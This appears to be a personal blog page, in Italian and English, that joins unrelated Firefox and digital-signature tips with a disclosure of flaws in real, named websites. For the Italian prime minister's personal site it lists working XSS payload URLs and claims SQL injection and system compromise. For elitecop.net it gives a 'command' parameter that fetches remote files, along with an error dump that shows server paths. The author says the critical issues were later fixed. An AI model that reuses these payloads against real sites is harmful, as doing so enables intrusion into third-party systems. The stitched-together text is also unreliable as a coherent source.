selezionare bit4ipki.dll presente nella cartella system32
ex.: C:\Windows\System32\bit4ipki.dll


______________________________________________________________

Riferimenti: https://www.firma.infocert.it/installazione/certificato3.php



______________________________________________________________


Problema "La rinegoziazione non è consentita su questo socket SSL"

andare nella configurazione di firefox ( about:config nella barre degli indirizzi )
aggiungere gli host dei siti voluti/necessari

es.:
security.ssl.renego_unrestricted_hosts   |  www.vetinfo.sanita.it

Riferimento soluzione trovata qui
http://forum.mozillaitalia.org/index.php?topic=50414.0

______________________________________________________________






http://www.matteorenzi.it/ | http://matteorenzi.sgpitalia.com | XSS, SQL INJ, etc

Personal website of the Italian  prime minister.



OLDER WEBSITE
XSS and SQL injections. Sys compromise (windows)

http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70


http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=1%EF%BF%BD%EF%BF%BD%EF%BF%BD72195%EF%BF%BD%EF%BF%BD%EF%BF%BD72195/0012%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDvedi_evento%EF%BF%BD%EF%BF%BD%EF%BF%BD1%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDpulisci%EF%BF%BD%EF%BF%BD%EF%BF%BD

carrello_beta.asp?azione=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
finestra_stampa_beta.asp?numero_immagini=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
popup.asp 
 
 
http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=76678%A7%A7%A776678/0075%A7%A7%A7vedi_evento%A7%A7%A71%A7%A7%A70#ad-image-5
 
 
 
UPDATE!
On WORDPRESS
Authors enumarion is allowed (not a big issue).
Folder listing ex. /wp-content/plugins/ (not a big issue).
Sql  Injection (I will disclose/update this part in the future).
 

UPDATE 
They've fixed the critical issues.
 

http://www.elitecop.net | read file, download remote files, system compromise

The website is dead and I suppose that it can be published.


http://www.elitecop.net/?command=/BradfordMDC/Core/SelectLayout.aspx?ReturnUrl=%2Fbmdc%2Fdefault%3FNRMODE%3DPublished%26NRORIGINALURL%3D%252fbmdc%252f%26NRNODEGUID%3D%257bFF6D29D6-98D7-4C9B-9C8B-1B11573299DD%257d%26NRCACHEHINT%3DGuest



Warning: file_get_contents(http://forums.officer.com/forums//BradfordMDC/Core/SelectLayout.aspx?ReturnUrl=/bmdc/default?NRMODE=Published&amp;amp;NRORIGINALURL=%2fbmdc%2f&amp;amp;NRNODEGUID=%7bFF6D29D6-98D7-4C9B-9C8B-1B11573299DD%7d&amp;amp;NRCACHEHINT=Guest) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/subdimen/public_html/elitecop.net/index.php on line 63
Bad URL = "http://forums.officer.com/forums//BradfordMDC/Core/SelectLayout.aspx?ReturnUrl=/bmdc/default?NRMODE=Published&amp;NRORIGINALURL=%2fbmdc%2f&amp;NRNODEGUID=%7bFF6D29D6-98D7-4C9B-9C8B-1B11573299DD%7d&amp;NRCACHEHINT=Guest"!

Twitter Delicious Facebook Digg Stumbleupon Favorites More